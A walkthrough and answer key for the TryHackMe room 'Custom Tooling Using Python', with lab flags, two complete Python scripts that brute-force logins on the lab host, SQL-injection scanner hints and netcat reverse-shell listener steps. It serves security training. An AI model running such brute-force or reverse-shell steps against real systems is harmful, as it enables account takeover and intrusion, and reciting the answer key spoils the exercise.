[THM] Custom Tooling Using Python
This is a full walkthrough with answers and explanations for the TryHackMe room "Custom Tooling Using Python".
Link to the room: https://tryhackme.com/room/customtoolingpython.
Remember to start the VM and the Attack Box. Run the command:
echo "VM_IP python.thm" >> /etc/hostsin the terminal before you start working on the next tasks.
[Task 2] Using a Coding Language for Custom Tooling
Does a scripting language perform better than a compiled language? (Yea/Nay)
1
Nay
Scripting languages are generally slower as interpretation only happens at runtime.
Which compiled language is easy to cross-compile?
1
Go
An advantage of
Gois : Fast executing and easy cross-compilation.
Which scripting language is best suited for web-based exploits?
1
JavaScript
JavaScriptis useful for web-based exploits and widely supported in web applications.
[Task 3] Developing a Brute-Forcing Tool
What is one of the renowned Python libraries used to send HTTP requests, interact with web applications, and analyse responses?
1
requests
What is the flag value after logging in as admin?
1
THM{Brute_Force_Success007}
Create and execute this script on your Attack Box:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
url = "http://python.thm/labs/lab1/index.php"
username = "admin"
# Generating 4-digit numeric passwords (0000-9999)
password_list = [str(i).zfill(4) for i in range(10000)]
def brute_force():
for password in password_list:
data = {"username": username, "password": password}
response = requests.post(url, data=data)
if "Invalid" not in response.text:
print(f"[+] Found valid credentials: {username}:{password}")
break
else:
print(f"[-] Attempted: {password}")
brute_force()
Can you attempt to log in as Mark, whose password follows a specific pattern? His password consists of the first three characters as digits (000-999) followed by a single uppercase letter (A-Z). What is the flag value?
1
THM{Brute_Force_Success_Mark001}
My script for this task:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
import string
url = "http://python.thm/labs/lab1/index.php"
username = "Mark"
lowercase_alphabet = string.ascii_lowercase
# Generating 3-digit numeric passwords followed by a single uppercase letter (000A-999Z)
password_list = [str(i).zfill(3) + l for i in range(1000) for l in string.ascii_uppercase]
def brute_force():
for password in password_list:
data = {"username": username, "password": password}
response = requests.post(url, data=data)
if "Invalid" not in response.text:
print(f"[+] Found valid credentials: {username}:{password}")
break
else:
print(f"[-] Attempted: {password}")
brute_force()
[Task 4] Developing a Vulnerability Scanner
How many vulnerabilities will be identified if we use the above scanner.py script with the updated URL http://python.thm/labs/lab2/departments.php?name=? (without changing the original code)
1
0
Change the URL in the scanner.py script and run it.
After tweaking the above script to use the appropriate GET parameter, how many payloads are found? (with changing the original code)
1
2
Change line 18 to
response = requests.get(url, params={"name": payload}).
Which of the following is the valid type of vulnerability? Write the correct option only:
A) CSRF B) SQL injection C) Prototype Pollution D) XSS
1
B
Result of the script:
Potential SQL injection detected with payload...
What is the name of the renowned library that is used to make concurrent requests to an endpoint?
1
Threading
Running scans sequentially is slow, so we use multi-threading to send multiple requests simultaneously, making our scanner faster and more efficient. For this we can use the
threadinglibrary.
[Task 5] Creating a Basic Exploit
What is the flag value?
1
THM{basic_exploit_using_python}
1.nc -lvnp 44442.Modify the last script and change the IP to the Attack Box.3.Find the file with the flag.
[Task 6]
What is the flag?
1
THM{6470e394cbf6dab6a91682cc8585059b}
Modify the last script to use your Attack Box IP, and remember to have open a listener.